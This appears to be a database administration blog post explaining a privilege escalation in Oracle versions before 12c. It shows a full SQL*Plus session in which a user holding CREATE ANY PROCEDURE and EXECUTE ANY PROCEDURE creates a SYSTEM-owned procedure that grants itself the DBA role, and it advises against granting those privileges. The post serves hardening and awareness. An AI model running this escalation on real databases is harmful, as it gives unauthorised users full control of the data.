Users which have Create any procedure and Execute any procedure privilege can assign themselves the DBA role.
October 8, 2024
In Oracle databases prior to 12c, users which have create any procedure and execute any procedure privileges could assign themselves the dba role. This vulnerability has been eliminated with 12c.
A user with the create any procedure and execute any procedure privilege can assign himself the DBA role by following the steps below. Therefore, a normal user should not be given the create any procedure and execute any procedure privilege.
First, let’s create a user named test that can only connect to the database. Then, the steps of how the relevant user will have the dba role are specified.
SQL> create user test identified by test;
User created.
SQL> grant create session to test;
Grant succeeded.
SQL> grant create any procedure to test;
Grant succeeded.
SQL> grant execute any procedure to test;
Grant succeeded.
SQL> exit
Disconnected from Oracle Database 11g Enterprise Edition Release 11.2.0.3.0 - 64bit Production
With the Partitioning, Real Application Clusters, Automatic Storage Management, OLAP,
Data Mining and Real Application Testing options
You have new mail in /var/mail/oracle
oracle@sc01dbadm01:~$ sqlplus test/test
SQL*Plus: Release 11.2.0.3.0 Production on Wed Nov 23 16:07:33 2022
Copyright (c) 1982, 2011, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.3.0 - 64bit Production
With the Partitioning, Real Application Clusters, Automatic Storage Management, OLAP,
Data Mining and Real Application Testing options
SQL> select * from session_roles;
no rows selected
SQL> create or replace procedure system.grant_dba_to_test is
2 begin
3 execute immediate 'grant dba to test';
4 end;
5 /
Procedure created.
SQL> exec system.grant_dba_to_test;
PL/SQL procedure successfully completed.
SQL> exit
Disconnected from Oracle Database 11g Enterprise Edition Release 11.2.0.3.0 - 64bit Production
With the Partitioning, Real Application Clusters, Automatic Storage Management, OLAP,
Data Mining and Real Application Testing options
oracle@sc01dbadm01:~$ sqlplus test/test
SQL*Plus: Release 11.2.0.3.0 Production on Wed Nov 23 16:09:00 2022
Copyright (c) 1982, 2011, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.3.0 - 64bit Production
With the Partitioning, Real Application Clusters, Automatic Storage Management, OLAP,
Data Mining and Real Application Testing options
SQL> select * from session_roles;
ROLE
------------------------------
DBA
SELECT_CATALOG_ROLE
HS_ADMIN_SELECT_ROLE
HS_ADMIN_ROLE
HS_ADMIN_EXECUTE_ROLE
EXECUTE_CATALOG_ROLE
DELETE_CATALOG_ROLE
EXP_FULL_DATABASE
IMP_FULL_DATABASE
DATAPUMP_EXP_FULL_DATABASE
DATAPUMP_IMP_FULL_DATABASE
ROLE
------------------------------
GATHER_SYSTEM_STATISTICS
SCHEDULER_ADMIN
WM_ADMIN_ROLE
XDBADMIN
XDB_SET_INVOKER
OLAP_DBA
JAVA_ADMIN
JAVA_DEPLOY
OLAP_XS_ADMIN
20 rows selected.
SQL>
